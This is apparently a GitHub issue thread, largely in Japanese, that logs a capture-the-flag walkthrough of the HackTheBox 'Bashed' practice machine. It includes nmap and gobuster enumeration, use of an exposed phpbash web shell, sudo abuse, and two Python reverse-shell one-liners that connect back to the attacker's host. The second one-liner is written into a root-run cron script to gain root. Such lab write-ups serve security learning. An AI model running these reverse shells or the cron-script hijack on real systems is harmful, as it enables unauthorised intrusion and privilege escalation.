search

roaris / ctf-log

0 stars 0 forks source link

HackTheBox: Bashed (Machine Easy) #8

Open roaris opened 6 months ago

roaris commented 6 months ago

https://app.hackthebox.com/machines/Bashed

$ nmap -sC -sV -Pn 10.10.10.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-24 17:22 JST
Nmap scan report for 10.10.10.68
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.03 seconds
roaris commented 6 months ago

ポート80にアクセスすると、phpbashの紹介ページが開かれる 攻撃対象のサイトにアップロードすると、ブラウザ上でシェルとして動作してくれるスクリプトらしい

roaris commented 6 months ago

I actually developed it on this exact server!とあるので、/phpbash.php, /phpbash.min.php, /uploads/phpbash.php, /uploads/phpbash.min.phpにアクセスしてみたが、Not Foundが返ってきた

roaris commented 6 months ago

gobusterを使う

$ gobuster dir --url http://10.10.10.68 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
Progress: 10399 / 87665 (11.86%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 10408 / 87665 (11.87%)
===============================================================
Finished
===============================================================

時間がかかりすぎるので途中で中断 /dev/にアクセスすると、phpbash.phpがあった

image

roaris commented 6 months ago

/home/arrexelにuser.txtがある

rootにアクセスしようとすると、Permission deniedとなる

www-data@bashed:/# ls root
ls: cannot open directory 'root': Permission denied

www-dataの権限ではアクセス出来ないらしい (www-dataとは https://qiita.com/micron/items/56cdc72112f2f9b09fa2)

www-data@bashed:/# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/# ls -l .
total 80
drwxr-xr-x 2 root root 4096 Jun 2 2022 bin
drwxr-xr-x 3 root root 4096 Jun 2 2022 boot
drwxr-xr-x 19 root root 4140 Feb 24 00:20 dev
drwxr-xr-x 89 root root 4096 Jun 2 2022 etc
drwxr-xr-x 4 root root 4096 Dec 4 2017 home
lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4096 Dec 4 2017 lib
drwxr-xr-x 2 root root 4096 Jun 2 2022 lib64
drwx------ 2 root root 16384 Dec 4 2017 lost+found
drwxr-xr-x 4 root root 4096 Dec 4 2017 media
drwxr-xr-x 2 root root 4096 Jun 2 2022 mnt
drwxr-xr-x 2 root root 4096 Dec 4 2017 opt
dr-xr-xr-x 170 root root 0 Feb 24 00:20 proc
drwx------ 3 root root 4096 Feb 24 00:21 root
drwxr-xr-x 18 root root 500 Feb 24 00:20 run
drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Feb 24 01:03 sys
drwxrwxrwt 10 root root 4096 Feb 24 01:05 tmp
drwxr-xr-x 10 root root 4096 Dec 4 2017 usr
drwxr-xr-x 12 root root 4096 Jun 2 2022 var
lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic

suやsudoも効かない

www-data@bashed:/# su
su: must be run from a terminal
www-data@bashed:/# sudo cd root
sudo: no tty present and no askpass program specified
roaris commented 6 months ago

/homeを見ると、scriptmanagerというユーザがいることが分かる

www-data@bashed:/var/www/html/dev# ls /home

arrexel
scriptmanager

sudo -l で確認しているwriteupもあった https://sanposhiho.com/posts/2020-03-15-qiita-494679a0edc89fe4375e

www-data@bashed:/# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

-lオプションの意味がよく分からない

-l, --list list user's privileges or check a specific
command; use twice for longer format
roaris commented 6 months ago

/scriptsはscriptmanagerしかアクセスできない

drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts

sudo -u scriptmanager /bin/bashでscriptmanagerに切り替わろうとするが、phpbash上だとなぜか上手くいかない

リバースシェルを起動して、sudo -u scriptmanager /bin/bashをすると切り替われる

リバースシェルはPythonのを使う https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#python

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.3",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
$ nc -lvp 8080
listening on [any] 8080 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.68] 41084
$ whoami
whoami
www-data
$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/$ whoami
whoami
scriptmanager
scriptmanager@bashed:/$
roaris commented 6 months ago

scriptsディレクトリの中を確認 手掛かりになるとは思えない...

scriptmanager@bashed:/scripts$ ls
ls
test.py  test.txt
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$
roaris commented 6 months ago

ls -lで確認すると、test.txtの更新時刻が現在時刻なのと、所有者がrootになっている

scriptmanager@bashed:/scripts$ ls -l
ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
-rw-r--r-- 1 root          root          12 Feb 24 03:10 test.txt

このMachineではPST(米国太平洋標準時)が使われていて、+17時間するとJSTになる dateコマンドでPSTが使われていることが確認できる

scriptmanager@bashed:/scripts$ date
date
Sat Feb 24 03:10:37 PST 2024

1分毎にtest.txtの更新時刻が変化している

test.txtの所有者がrootになっていることも含めると、rootユーザによってtest.pyが定期実行されていることが推測出来る scriptmanagerはtest.pyを編集することは出来るので、リバースシェルを取るように編集すれば、rootユーザのシェルが獲得出来る

roaris commented 6 months ago

さっきと同様のリバースシェルのプログラム(ポート番号変えただけ)をechoで書き込む

scriptmanager@bashed:/scripts$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.3",8081));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > test.py

ポート8081で待っていると、rootユーザのシェルを取れた

$ nc -lvp 8081
listening on [any] 8081 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.68] 59914
# whoami
whoami
root

/root/root.txtを表示して終わり

cronで定期実行されていることが確認出来る https://0xdf.gitlab.io/2018/04/29/htb-bashed.html

# crontab -l
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done

* * * * *は1分毎という意味 https://qiita.com/UNILORN/items/a1a3f62409cdb4256219